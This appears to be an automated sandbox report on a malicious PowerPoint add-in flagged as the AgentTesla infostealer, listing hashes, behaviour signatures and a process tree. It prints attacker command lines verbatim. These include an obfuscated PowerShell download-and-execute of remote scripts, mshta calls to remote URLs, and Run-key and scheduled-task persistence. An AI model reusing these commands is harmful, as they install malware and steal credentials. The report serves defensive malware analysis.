Analysis
- max time kernel: 109s
- max time network: 135s
- platform: windows10_x64
- resource: win10-en-20210920
- submitted: 19-10-2021 08:22
Static task: static1
Behavioral task: behavioral1
- Sample: Import Invoice Duty and Clearance.ppam
- Resource: win7-en-20211014
Behavioral task: behavioral2
- Sample: Import Invoice Duty and Clearance.ppam
- Resource: win10-en-20210920
General
- Target: Import Invoice Duty and Clearance.ppam
- Size: 8KB
- MD5: 7659d46dbf1d34e7833e4b0b2968f281
- SHA1: 05f65097aefb7a9c8269ef63d7aec4764079b970
- SHA256: 0cabc6544bb554fc6900c766ade30bee9bd403f64231e87b65fc9182128d7515
- SHA512: db5f925cd241e429593c18148f9b9ded717ef87bf935a9d134579d1139c23292201803104910896ef4ecde4891735690b2826f82cefb6762d61763244e94e4ec
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.
-
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
- mshta.exe (PID 3616), spawned by POWERPNT.EXE (PID 2180): Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process
-
AgentTesla Payload (3 IoCs)
YARA matches (resource: rule):
- behavioral2/memory/3628-325-0x000000000043755E-mapping.dmp: family_agenttesla
- behavioral2/memory/1300-392-0x000000000043755E-mapping.dmp: family_agenttesla
- behavioral2/memory/1300-398-0x0000000005160000-0x000000000565E000-memory.dmp: family_agenttesla
-
Blocklisted process makes network request (15 IoCs)
Processes (network flow IDs):
- mshta.exe (PID 3616): flows 28, 29, 33, 36, 38, 40, 41, 43, 47, 48, 50, 52, 54, 59
- powershell.exe (PID 3396): flow 56
-
Drops file in Drivers directory (2 IoCs)
Processes:
- jsc.exe: File opened for modification C:\Windows\system32\drivers\etc\hosts
- RegAsm.exe: File opened for modification C:\Windows\system32\drivers\etc\hosts
Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles (1 TTP, 6 IoCs)
Processes:
- RegAsm.exe: Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- RegAsm.exe: Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- RegAsm.exe: Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- jsc.exe: Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- jsc.exe: Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- jsc.exe: Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
-
Adds Run key to start application (2 TTPs, 5 IoCs)
Processes:
- mshta.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/13.html\""
- mshta.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_8f22087a2c0740eba07c3aea05e107e7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_959babd593ed4cd49dd3b6a0f1146d59.txt').GetResponse().GetResponseStream()).ReadToend());"
- mshta.exe: Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run
- mshta.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/13.html\""
- mshta.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/13.html\""
Suspicious use of SetThreadContext (2 IoCs)
Processes:
- powershell.exe (PID 3396) set thread context of jsc.exe (PID 3628)
- powershell.exe (PID 3396) set thread context of RegAsm.exe (PID 1300)
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
- POWERPNT.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
- POWERPNT.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
- POWERPNT.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
-
Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
- POWERPNT.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
- POWERPNT.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
- POWERPNT.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
-
Kills process with taskkill (2 IoCs)
Processes:
- taskkill.exe (PID 3188)
- taskkill.exe (PID 3344)
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
- POWERPNT.EXE (PID 2180)
-
Suspicious behavior: EnumeratesProcesses (9 IoCs)
Processes:
- dw20.exe (PID 2528), 2 entries
- powershell.exe (PID 3396), 3 entries
- jsc.exe (PID 3628), 2 entries
- RegAsm.exe (PID 1300), 2 entries
-
Suspicious behavior: SetClipboardViewer (1 IoC)
Processes:
- RegAsm.exe (PID 1300)
-
Suspicious use of AdjustPrivilegeToken (5 IoCs)
Processes:
- taskkill.exe (PID 3188): Token: SeDebugPrivilege
- taskkill.exe (PID 3344): Token: SeDebugPrivilege
- powershell.exe (PID 3396): Token: SeDebugPrivilege
- jsc.exe (PID 3628): Token: SeDebugPrivilege
- RegAsm.exe (PID 1300): Token: SeDebugPrivilege
-
Suspicious use of FindShellTrayWindow (1 IoC)
Processes:
- POWERPNT.EXE (PID 2180)
-
Suspicious use of SetWindowsHookEx (5 IoCs)
Processes:
- POWERPNT.EXE (PID 2180), 3 entries
- jsc.exe (PID 3628)
- RegAsm.exe (PID 1300)
Suspicious use of WriteProcessMemory (32 IoCs)
Processes (writer, target, number of entries):
- POWERPNT.EXE (PID 2180) wrote to memory of mshta.exe (PID 3616): 2 entries
- mshta.exe (PID 3616) wrote to memory of taskkill.exe (PID 3188): 2 entries
- mshta.exe (PID 3616) wrote to memory of taskkill.exe (PID 3344): 2 entries
- mshta.exe (PID 3616) wrote to memory of schtasks.exe (PID 1420): 2 entries
- mshta.exe (PID 3616) wrote to memory of dw20.exe (PID 2528): 2 entries
- mshta.exe (PID 3616) wrote to memory of powershell.exe (PID 3396): 2 entries
- powershell.exe (PID 3396) wrote to memory of jsc.exe (PID 3628): 8 entries
- powershell.exe (PID 3396) wrote to memory of csc.exe (PID 2012): 2 entries
- csc.exe (PID 2012) wrote to memory of cvtres.exe (PID 1864): 2 entries
- powershell.exe (PID 3396) wrote to memory of RegAsm.exe (PID 1300): 8 entries
-
outlook_office_path (1 IoC)
Processes:
- RegAsm.exe: Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
-
outlook_win_path (1 IoC)
Processes:
- RegAsm.exe: Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Processes
(process tree; indentation and the depth number give the parent/child relationship)
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE (depth 1)
  command line: "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Import Invoice Duty and Clearance.ppam" /ou ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\mshta.exe (depth 2)
    command line: "C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwdwdrufhjwijjd
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\taskkill.exe (depth 3)
      command line: "C:\Windows\System32\taskkill.exe" /f /im winword.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\taskkill.exe (depth 3)
      command line: "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe (depth 3)
      command line: dw20.exe -x -s 2932
      - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_8f22087a2c0740eba07c3aea05e107e7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_959babd593ed4cd49dd3b6a0f1146d59.txt').GetResponse().GetResponseStream()).ReadToend());
      - Blocklisted process makes network request
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe (depth 4)
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        - Drops file in Drivers directory
        - Accesses Microsoft Outlook profiles
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 4)
        command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4qcyrxrj\4qcyrxrj.cmdline"
        - Suspicious use of WriteProcessMemory
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 5)
          command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES21BD.tmp" "c:\Users\Admin\AppData\Local\Temp\4qcyrxrj\CSC8FAB9AA34374446FA246EFC3ABFA7A2C.TMP"
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe (depth 4)
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        - Drops file in Drivers directory
        - Accesses Microsoft Outlook profiles
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: SetClipboardViewer
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        - outlook_office_path
        - outlook_win_path
    C:\Windows\System32\schtasks.exe (depth 3)
      command line: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/13.html\""
      - Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
Dropped files (hash listing omitted):
- C:\Users\Admin\AppData\Local\Temp\4qcyrxrj\4qcyrxrj.dll
- C:\Users\Admin\AppData\Local\Temp\RES21BD.tmp
- C:\Windows\system32\drivers\etc\hosts
- \??\c:\Users\Admin\AppData\Local\Temp\4qcyrxrj\4qcyrxrj.0.cs
- \??\c:\Users\Admin\AppData\Local\Temp\4qcyrxrj\4qcyrxrj.cmdline
- \??\c:\Users\Admin\AppData\Local\Temp\4qcyrxrj\CSC8FAB9AA34374446FA246EFC3ABFA7A2C.TMP